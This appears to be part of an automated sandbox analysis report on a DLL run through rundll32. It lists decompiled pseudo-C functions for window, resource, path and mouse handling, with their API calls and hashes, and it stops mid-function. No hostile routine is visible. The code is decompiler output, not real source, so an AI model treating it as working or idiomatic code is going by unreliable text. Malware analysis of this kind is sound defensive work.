                                                                                                        						}
                                                                                                        						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                                                                        						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                                                                        							E100117F5(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                        					__eflags =  *(_t101 - 0x28) - _t97;
                                                                                                        					if( *(_t101 - 0x28) != _t97) {
                                                                                                        						E10011775(_t84, 1);
                                                                                                        					}
                                                                                                        					__eflags =  *(_t101 - 0x2c) - _t97;
                                                                                                        					if( *(_t101 - 0x2c) != _t97) {
                                                                                                        						EnableWindow( *(_t101 - 0x14), 1);
                                                                                                        					}
                                                                                                        					__eflags =  *(_t101 - 0x14) - _t97;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                                                                        						if(__eflags == 0) {
                                                                                                        							SetActiveWindow( *(_t101 - 0x14));
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)( *_t100 + 0x60))();
                                                                                                        					E10009C88(_t84, _t100, _t97, _t100, __eflags);
                                                                                                        					__eflags =  *(_t100 + 0x58) - _t97;
                                                                                                        					if( *(_t100 + 0x58) != _t97) {
                                                                                                        						FreeResource( *(_t101 - 0x18));
                                                                                                        					}
                                                                                                        					_t63 =  *(_t100 + 0x44);
                                                                                                        					goto L31;
                                                                                                        				} else {
                                                                                                        					_t63 = _t54 | 0xffffffff;
                                                                                                        					L31:
                                                                                                        					return E1003EF21(_t63);
                                                                                                        				}
                                                                                                        			}

















                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000A0FB
                                                                                                        • FindResourceA.KERNEL32(?,?,00000005), ref: 1000A12E
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000A136
                                                                                                        • LockResource.KERNEL32(?,00000024,10005DF1), ref: 1000A147
                                                                                                        • GetDesktopWindow.USER32 ref: 1000A17A
                                                                                                        • IsWindowEnabled.USER32(?), ref: 1000A188
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 1000A197
                                                                                                          • Part of subcall function 1001175A: IsWindowEnabled.USER32(?), ref: 10011763
                                                                                                          • Part of subcall function 10011775: EnableWindow.USER32(?,?), ref: 10011782
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000A273
                                                                                                        • GetActiveWindow.USER32 ref: 1000A27E
                                                                                                        • SetActiveWindow.USER32(?,?,00000024,10005DF1), ref: 1000A28C
                                                                                                        • FreeResource.KERNEL32(?,?,00000024,10005DF1), ref: 1000A2A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1509511306-0
                                                                                                        • Opcode ID: b724f489e0530e0053a87cafde1a89b908525f936da5bccd636eb58396c7ef11
                                                                                                        • Instruction ID: 1ed850bfacade8e03f614ee38965a319621bb4febb32a9e65c6a07d79f59a685
                                                                                                        • Opcode Fuzzy Hash: b724f489e0530e0053a87cafde1a89b908525f936da5bccd636eb58396c7ef11
                                                                                                        • Instruction Fuzzy Hash: 7A519E34A00705DFEB11DFA4C8996AEBBF1FF49781F11022DE902B62A5DB719E81CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 86%
                                                                                                        			E1002C51C(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				signed int _v20;
                                                                                                        				struct tagPOINT _v28;
                                                                                                        				intOrPtr _v40;
                                                                                                        				signed int _v72;
                                                                                                        				char _v76;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t60;
                                                                                                        				signed int _t62;
                                                                                                        				signed int _t63;
                                                                                                        				signed int _t67;
                                                                                                        				signed int _t70;
                                                                                                        				intOrPtr _t72;
                                                                                                        				signed int _t79;
                                                                                                        				short _t80;
                                                                                                        				short _t87;
                                                                                                        				short _t92;
                                                                                                        				intOrPtr _t111;
                                                                                                        				intOrPtr _t115;
                                                                                                        				intOrPtr _t116;
                                                                                                        				intOrPtr* _t118;
                                                                                                        
                                                                                                        				_t115 = _a4;
                                                                                                        				_t118 = __ecx;
                                                                                                        				if(E1000C592(__ecx, __eflags, _t115) == 0) {
                                                                                                        					_t116 =  *((intOrPtr*)(_t115 + 4));
                                                                                                        					_push(__ebx);
                                                                                                        					_t100 = __ecx;
                                                                                                        					_t60 = E1000F8F1(__ecx);
                                                                                                        					__eflags =  *(__ecx + 0x80) & 0x00000020;
                                                                                                        					_v20 = _t60;
                                                                                                        					if(( *(__ecx + 0x80) & 0x00000020) != 0) {
                                                                                                        						L5:
                                                                                                        						__eflags = _t116 - 0x200;
                                                                                                        						if(_t116 < 0x200) {
                                                                                                        							L7:
                                                                                                        							__eflags = _t116 - 0xa0 - 9;
                                                                                                        							if(__eflags > 0) {
                                                                                                        								L30:
                                                                                                        								_t62 = E1000F039(_t118);
                                                                                                        								__eflags = _t62;
                                                                                                        								if(_t62 == 0) {
                                                                                                        									L32:
                                                                                                        									__eflags = _v20;
                                                                                                        									if(_v20 == 0) {
                                                                                                        										L35:
                                                                                                        										_t63 = IsWindow( *(_t118 + 0x20));
                                                                                                        										__eflags = _t63;
                                                                                                        										if(_t63 == 0) {
                                                                                                        											L37:
                                                                                                        											__eflags = 0;
                                                                                                        											return 0;
                                                                                                        										}
                                                                                                        										return E1000CB93(_a4);
                                                                                                        									} else {
                                                                                                        										goto L33;
                                                                                                        									}
                                                                                                        									while(1) {
                                                                                                        										L33:
                                                                                                        										_t117 = _v20;
                                                                                                        										_t67 =  *((intOrPtr*)( *_v20 + 0x100))(_a4);
                                                                                                        										__eflags = _t67;
                                                                                                        										if(_t67 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										_t70 = E1000EFFA(_t117);
                                                                                                        										__eflags = _t70;
                                                                                                        										_v20 = _t70;
                                                                                                        										if(_t70 != 0) {
                                                                                                        											continue;
                                                                                                        										}
                                                                                                        										goto L35;
                                                                                                        									}
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								__eflags =  *(_t62 + 0x68);
                                                                                                        								if( *(_t62 + 0x68) != 0) {
                                                                                                        									goto L37;
                                                                                                        								}
                                                                                                        								goto L32;
                                                                                                        							}
                                                                                                        							L8:
                                                                                                        							_v16 = E1000AB4C(0x201, _t100, _t116, _t118, __eflags);
                                                                                                        							_t72 = _a4;
                                                                                                        							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
                                                                                                        							_v28.x =  *(_t72 + 0x14);
                                                                                                        							ScreenToClient( *(_t118 + 0x20),  &_v28);
                                                                                                        							E1003E9B0(_t116,  &_v76, 0, 0x30);
                                                                                                        							_v76 = 0x28;
                                                                                                        							_t79 =  *((intOrPtr*)( *_t118 + 0x6c))(_v28.x, _v28.y,  &_v76);
                                                                                                        							__eflags = _v40 - 0xffffffff;
                                                                                                        							_v8 = _t79;
                                                                                                        							if(__eflags != 0) {
                                                                                                        								_push(_v40);
                                                                                                        								E10039F30(0x201, _t116, _t118, __eflags);
                                                                                                        							}
                                                                                                        							__eflags = _t116 - 0x201;
                                                                                                        							if(_t116 != 0x201) {
                                                                                                        								L13:
                                                                                                        								_v12 = _v12 & 0x00000000;
                                                                                                        								__eflags = _t116 - 0x201;
                                                                                                        								if(_t116 != 0x201) {
                                                                                                        									_t92 = GetKeyState(1);
                                                                                                        									__eflags = _t92;
                                                                                                        									if(_t92 < 0) {
                                                                                                        										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
                                                                                                        									}
                                                                                                        								}
                                                                                                        								L16:
                                                                                                        								__eflags = _v8;
                                                                                                        								if(_v8 < 0) {
                                                                                                        									L26:
                                                                                                        									_t80 = GetKeyState(1);
                                                                                                        									__eflags = _t80;
                                                                                                        									if(_t80 >= 0) {
                                                                                                        										L28:
                                                                                                        										 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
                                                                                                        										KillTimer( *(_t118 + 0x20), 0xe001);
                                                                                                        										L29:
                                                                                                        										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
                                                                                                        										goto L30;
                                                                                                        									}
                                                                                                        									__eflags = _v12;
                                                                                                        									if(_v12 == 0) {
                                                                                                        										goto L29;
                                                                                                        									}
                                                                                                        									goto L28;
                                                                                                        								}
                                                                                                        								__eflags = _v12;
                                                                                                        								if(_v12 != 0) {
                                                                                                        									goto L26;
                                                                                                        								}
                                                                                                        								__eflags = _t116 - 0x202;
                                                                                                        								if(_t116 != 0x202) {
                                                                                                        									__eflags =  *(_t118 + 0x7c) & 0x00000008;
                                                                                                        									if(( *(_t118 + 0x7c) & 0x00000008) != 0) {
                                                                                                        										L25:
                                                                                                        										 *((intOrPtr*)( *_t118 + 0x164))(_v8);
                                                                                                        										goto L29;
                                                                                                        									}
                                                                                                        									_t87 = GetKeyState(1);
                                                                                                        									__eflags = _t87;
                                                                                                        									if(_t87 < 0) {
                                                                                                        										goto L25;
                                                                                                        									}
                                                                                                        									_t111 = _v16;
                                                                                                        									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
                                                                                                        									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
                                                                                                        										goto L29;
                                                                                                        									}
                                                                                                        									_push(0x12c);
                                                                                                        									_push(0xe000);
                                                                                                        									L20:
                                                                                                        									E1002BBBB(_t118);
                                                                                                        									goto L29;
                                                                                                        								}
                                                                                                        								 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
                                                                                                        								_push(0xc8);
                                                                                                        								_push(0xe001);
                                                                                                        								goto L20;
                                                                                                        							}
                                                                                                        							__eflags = _v72 & 0x80000000;
                                                                                                        							if((_v72 & 0x80000000) == 0) {
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							_v12 = 1;
                                                                                                        							goto L16;
                                                                                                        						}
                                                                                                        						__eflags = _t116 - 0x209;
                                                                                                        						if(__eflags <= 0) {
                                                                                                        							goto L8;
                                                                                                        						}
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        					__eflags = _t116 - 0x201;
                                                                                                        					if(_t116 == 0x201) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					__eflags = _t116 - 0x202;
                                                                                                        					if(_t116 != 0x202) {
                                                                                                        						goto L30;
                                                                                                        					}
                                                                                                        					goto L5;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				return 1;
                                                                                                        			}





























                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientScreenWindow_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 1268500159-3887548279
                                                                                                        • Opcode ID: 5189579516be3e26e94f9f8a042d911c248b09b7d8da56a2f08f3b3d2b61556d
                                                                                                        • Instruction ID: 3b976960c39fad2a1f5a8c11b28448dcfff239e20118b40ed98fb4e501ff2bb9
                                                                                                        • Opcode Fuzzy Hash: 5189579516be3e26e94f9f8a042d911c248b09b7d8da56a2f08f3b3d2b61556d
                                                                                                        • Instruction Fuzzy Hash: 6151C134A00609AFDB10DFE4D888FADBBF1EF04384FA14169E906A7291D771AE81CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002F3E9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t38;
                                                                                                        				long _t49;
                                                                                                        				CHAR* _t50;
                                                                                                        				CHAR* _t56;
                                                                                                        				CHAR* _t59;
                                                                                                        				void* _t61;
                                                                                                        				int _t65;
                                                                                                        				CHAR* _t74;
                                                                                                        				void* _t75;
                                                                                                        				void* _t76;
                                                                                                        				void* _t89;
                                                                                                        				void* _t90;
                                                                                                        				CHAR* _t92;
                                                                                                        				void* _t93;
                                                                                                        				void* _t96;
                                                                                                        				struct _WIN32_FIND_DATAA* _t98;
                                                                                                        				void* _t100;
                                                                                                        				CHAR* _t106;
                                                                                                        
                                                                                                        				_t94 = __esi;
                                                                                                        				_t90 = __edx;
                                                                                                        				_t76 = __ecx;
                                                                                                        				_t98 = _t100 - 0x13c;
                                                                                                        				_t38 =  *0x10072650; // 0xb5e27fef
                                                                                                        				 *(_t98 + 0x140) = _t38 ^ _t98;
                                                                                                        				_push(0x14);
                                                                                                        				E1003EE82(0x10055bd1, __ebx, __edi, __esi);
                                                                                                        				_t92 =  *(_t98 + 0x14c);
                                                                                                        				_t74 =  *(_t98 + 0x150);
                                                                                                        				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
                                                                                                        				_t106 = _t92;
                                                                                                        				_t107 = _t106 == 0;
                                                                                                        				if(_t106 == 0) {
                                                                                                        					L1:
                                                                                                        					E1000836F(_t74, _t76, _t92, _t94, _t107);
                                                                                                        				}
                                                                                                        				if((0 | _t74 != 0x00000000) == 0) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
                                                                                                        				if(_t49 != 0) {
                                                                                                        					__eflags = _t49 - 0x104;
                                                                                                        					if(_t49 >= 0x104) {
                                                                                                        						goto L5;
                                                                                                        					} else {
                                                                                                        						E10001DB0(_t98 - 0x10, E10007F7E());
                                                                                                        						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                                                                        						E1002F247(_t74, _t98, __eflags, _t92, _t98 - 0x10);
                                                                                                        						_t56 = PathIsUNCA( *(_t98 - 0x10));
                                                                                                        						__eflags = _t56;
                                                                                                        						if(_t56 != 0) {
                                                                                                        							L19:
                                                                                                        							E10001280( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                                                                        							_t50 = 1;
                                                                                                        							__eflags = 1;
                                                                                                        						} else {
                                                                                                        							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
                                                                                                        							__eflags = _t59;
                                                                                                        							if(_t59 != 0) {
                                                                                                        								__eflags =  *(_t98 - 0x1c) & 0x00000002;
                                                                                                        								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
                                                                                                        									CharUpperA(_t92);
                                                                                                        								}
                                                                                                        								__eflags =  *(_t98 - 0x1c) & 0x00000004;
                                                                                                        								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
                                                                                                        									goto L19;
                                                                                                        								} else {
                                                                                                        									_t61 = FindFirstFileA(_t74, _t98);
                                                                                                        									__eflags = _t61 - 0xffffffff;
                                                                                                        									if(_t61 == 0xffffffff) {
                                                                                                        										goto L19;
                                                                                                        									} else {
                                                                                                        										FindClose(_t61);
                                                                                                        										__eflags =  *(_t98 - 0x14);
                                                                                                        										if( *(_t98 - 0x14) == 0) {
                                                                                                        											goto L10;
                                                                                                        										} else {
                                                                                                        											__eflags =  *(_t98 - 0x14) - _t92;
                                                                                                        											if( *(_t98 - 0x14) <= _t92) {
                                                                                                        												goto L10;
                                                                                                        											} else {
                                                                                                        												_t65 = lstrlenA( &(_t98->cFileName));
                                                                                                        												_t89 =  *(_t98 - 0x14) - _t92;
                                                                                                        												__eflags = _t65 + _t89 - 0x104;
                                                                                                        												if(_t65 + _t89 >= 0x104) {
                                                                                                        													goto L10;
                                                                                                        												} else {
                                                                                                        													_t97 = 0x104 - _t89;
                                                                                                        													__eflags = 0x104 - _t89;
                                                                                                        													E10025E38(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
                                                                                                        													goto L19;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								_push(_t74);
                                                                                                        								E1002F3BE(_t92,  *((intOrPtr*)(_t98 - 0x18)));
                                                                                                        								L10:
                                                                                                        								E10001280( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                                                                        								goto L5;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					E100083B8(_t74, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
                                                                                                        					_push(_t74);
                                                                                                        					E1002F3BE(_t92,  *((intOrPtr*)(_t98 - 0x18)));
                                                                                                        					L5:
                                                                                                        					_t50 = 0;
                                                                                                        				}
                                                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                                                                        				_pop(_t93);
                                                                                                        				_pop(_t96);
                                                                                                        				_pop(_t75);
                                                                                                        				return E10039F21(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
                                                                                                        			}























                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1002F408
                                                                                                        • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 1002F449
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • PathIsUNCA.SHLWAPI(?,?,?,00000000), ref: 1002F493
                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 1002F4B1
                                                                                                        • CharUpperA.USER32(?), ref: 1002F4D8
                                                                                                        • FindFirstFileA.KERNEL32(?,00000000), ref: 1002F4E9
                                                                                                        • FindClose.KERNEL32(00000000), ref: 1002F4F5
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1002F50A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4099955704-0
                                                                                                        • Opcode ID: 9cda7c8987709977b133612f26a677290ede3d50c480b065a90195aa96a01617
                                                                                                        • Instruction ID: 67faae7cd98050ab63f6579e4938a12d3730f5cbb5b6b41027c11cef4078a9fd
                                                                                                        • Opcode Fuzzy Hash: 9cda7c8987709977b133612f26a677290ede3d50c480b065a90195aa96a01617
                                                                                                        • Instruction Fuzzy Hash: B041927190015AABEB11EBB4DC85AFF77BCEF04394F50053AF915E2191EB74AA04CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 67%
                                                                                                        			E10014B67(void* __ecx, signed int _a4, long _a8) {
                                                                                                        				struct HWND__* _v8;
                                                                                                        				signed short _t23;
                                                                                                        				signed short _t24;
                                                                                                        				long _t25;
                                                                                                        				void* _t30;
                                                                                                        				int _t33;
                                                                                                        				struct HWND__* _t37;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_t30 = __ecx;
                                                                                                        				if(GetKeyState(0x11) < 0) {
                                                                                                        					_push(8);
                                                                                                        					_pop(0);
                                                                                                        				}
                                                                                                        				_t23 = 0;
                                                                                                        				if(GetKeyState(0x10) < 0) {
                                                                                                        					_push(4);
                                                                                                        					_pop(0);
                                                                                                        				}
                                                                                                        				_t24 = _t23;
                                                                                                        				_t37 = GetFocus();
                                                                                                        				_v8 = GetDesktopWindow();
                                                                                                        				if(_t37 != 0) {
                                                                                                        					_t33 = _a4 << 0x00000010 | _t24 & 0x0000ffff;
                                                                                                        					do {
                                                                                                        						_t25 = SendMessageA(_t37, 0x20a, _t33, _a8);
                                                                                                        						_t37 = GetParent(_t37);
                                                                                                        					} while (_t25 == 0 && _t37 != 0 && _t37 != _v8);
                                                                                                        				} else {
                                                                                                        					_t25 = SendMessageA( *(_t30 + 0x20), 0x20a, _a4 << 0x00000010 | _t24 & 0x0000ffff, _a8);
                                                                                                        				}
                                                                                                        				return _t25;
                                                                                                        			}











                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 4150626516-0
                                                                                                        • Opcode ID: 5b01bf8b0614625b6dfc4712dda570fc563ac6b4fe4747a355393bb96065c35e
                                                                                                        • Instruction ID: da954c3516a4c67a5c0724ce6e9457ef8f07bb291b94b912e3f58d07756065a0
                                                                                                        • Opcode Fuzzy Hash: 5b01bf8b0614625b6dfc4712dda570fc563ac6b4fe4747a355393bb96065c35e
                                                                                                        • Instruction Fuzzy Hash: 06110D35A01325BBF7509BA58CC5E5A36A8EB047A4F020421FE41EB160EBB0DD4097A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E1000B92A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr _t89;
                                                                                                        				intOrPtr _t90;
                                                                                                        				signed int* _t95;
                                                                                                        				intOrPtr* _t96;
                                                                                                        				void* _t99;
                                                                                                        				void* _t110;
                                                                                                        				void* _t113;
                                                                                                        				intOrPtr* _t115;
                                                                                                        				intOrPtr* _t119;
                                                                                                        				int _t124;
                                                                                                        				WCHAR* _t125;
                                                                                                        				intOrPtr* _t132;
                                                                                                        				intOrPtr* _t137;
                                                                                                        				void* _t158;
                                                                                                        				signed int _t163;
                                                                                                        				void* _t165;
                                                                                                        				intOrPtr _t169;
                                                                                                        				intOrPtr* _t171;
                                                                                                        				WCHAR* _t175;
                                                                                                        				void* _t177;
                                                                                                        				void* _t178;
                                                                                                        
                                                                                                        				_t158 = __edx;
                                                                                                        				_push(0x48);
                                                                                                        				E1003EEEB(0x100532f9, __ebx, __edi, __esi);
                                                                                                        				_t137 =  *((intOrPtr*)(_t177 + 8));
                                                                                                        				_t163 = 0;
                                                                                                        				 *((intOrPtr*)(_t177 - 0x2c)) =  *((intOrPtr*)(_t177 + 0xc));
                                                                                                        				 *(_t177 - 0x50) =  *(_t177 + 0x1c);
                                                                                                        				 *(_t177 - 0x28) = 0;
                                                                                                        				 *((intOrPtr*)(_t177 - 0x44)) = 0;
                                                                                                        				 *((intOrPtr*)(_t177 - 0x40)) = 0;
                                                                                                        				 *((intOrPtr*)(_t177 - 0x24)) = 0;
                                                                                                        				 *(_t177 - 0x38) = 0;
                                                                                                        				_t89 = E1002AC81(__ecx, _t137, 0x10061bc0);
                                                                                                        				 *((intOrPtr*)(_t177 - 0x48)) = _t89;
                                                                                                        				 *(_t177 - 0x3c) = 0 | _t89 != 0x00000000;
                                                                                                        				_t90 = E1002AC81(_t89 != 0, _t137, 0x10061b60);
                                                                                                        				_push(_t177 - 0x20);
                                                                                                        				 *((intOrPtr*)(_t177 - 0x4c)) = _t90;
                                                                                                        				_push(_t137);
                                                                                                        				if( *((intOrPtr*)( *_t137 + 0x3c))() != 0) {
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					_t163 = 0;
                                                                                                        				}
                                                                                                        				_t169 = 1;
                                                                                                        				 *((intOrPtr*)( *_t137 + 0x40))(_t137, 1, _t177 - 0x28);
                                                                                                        				if( *(_t177 - 0x3c) == _t163) {
                                                                                                        					__eflags =  *((intOrPtr*)(_t177 - 0x2c)) - _t163;
                                                                                                        					if( *((intOrPtr*)(_t177 - 0x2c)) == _t163) {
                                                                                                        						_t113 =  *((intOrPtr*)( *_t137 + 0x20))(_t137, 4, 3, _t177 - 0x44);
                                                                                                        						__eflags = _t113;
                                                                                                        						if(_t113 == 0) {
                                                                                                        							__imp__CreateBindCtx(_t163, _t177 - 0x40);
                                                                                                        							_t115 =  *((intOrPtr*)(_t177 - 0x44));
                                                                                                        							 *((intOrPtr*)( *_t115 + 0x50))(_t115,  *((intOrPtr*)(_t177 - 0x40)), _t163, _t177 - 0x2c);
                                                                                                        							E1002ACA5(_t177 - 0x40);
                                                                                                        							goto L14;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t185 =  *(_t177 - 0x28) - _t163;
                                                                                                        					if( *(_t177 - 0x28) != _t163) {
                                                                                                        						E1000816B(_t177 - 0x24, E10007F7E());
                                                                                                        						 *(_t177 - 4) = _t163;
                                                                                                        						E1000B6D4(_t177 - 0x24, 0xf094);
                                                                                                        						_t124 = lstrlenW( *(_t177 - 0x28));
                                                                                                        						_t28 =  *((intOrPtr*)(_t177 - 0x24)) - 0xc; // 0x0
                                                                                                        						_t173 =  *_t28 + _t124 + 1;
                                                                                                        						_t125 = E1000ACF7( *((intOrPtr*)(_t177 - 0x24)), _t185,  *_t28 + _t124 + 1, 2);
                                                                                                        						_t186 = _t125 - _t163;
                                                                                                        						 *(_t177 - 0x3c) = _t125;
                                                                                                        						if(_t125 != _t163) {
                                                                                                        							 *(_t177 - 0x54) =  *(E1003F256(_t186));
                                                                                                        							 *(E1003F256(_t186)) = _t163;
                                                                                                        							_t175 =  *(_t177 - 0x3c);
                                                                                                        							E1003F1FC(_t175, _t173, _t173 - 1,  *((intOrPtr*)(_t177 - 0x24)),  *(_t177 - 0x28));
                                                                                                        							_t178 = _t178 + 0x14;
                                                                                                        							_t132 = E1003F256(_t186);
                                                                                                        							_t187 =  *_t132 - _t163;
                                                                                                        							if( *_t132 == _t163) {
                                                                                                        								 *(E1003F256(__eflags)) =  *(_t177 - 0x54);
                                                                                                        							} else {
                                                                                                        								E1000B122( *((intOrPtr*)(E1003F256(_t187))));
                                                                                                        							}
                                                                                                        							__imp__CoTaskMemFree( *(_t177 - 0x28));
                                                                                                        							 *(_t177 - 0x28) = _t175;
                                                                                                        						}
                                                                                                        						 *(_t177 - 4) =  *(_t177 - 4) | 0xffffffff;
                                                                                                        						E10001280( *((intOrPtr*)(_t177 - 0x24)) + 0xfffffff0, _t158);
                                                                                                        						_t169 = 1;
                                                                                                        					}
                                                                                                        					_t119 =  *((intOrPtr*)(_t177 - 0x48));
                                                                                                        					 *((intOrPtr*)( *_t119 + 0x20))(_t119, _t177 - 0x2c);
                                                                                                        					L14:
                                                                                                        					 *((intOrPtr*)(_t177 - 0x24)) = _t169;
                                                                                                        				}
                                                                                                        				_t95 =  *(_t177 - 0x50);
                                                                                                        				if(_t95 == _t163) {
                                                                                                        					_t96 =  *((intOrPtr*)(_t177 - 0x4c));
                                                                                                        					__eflags = _t96 - _t163;
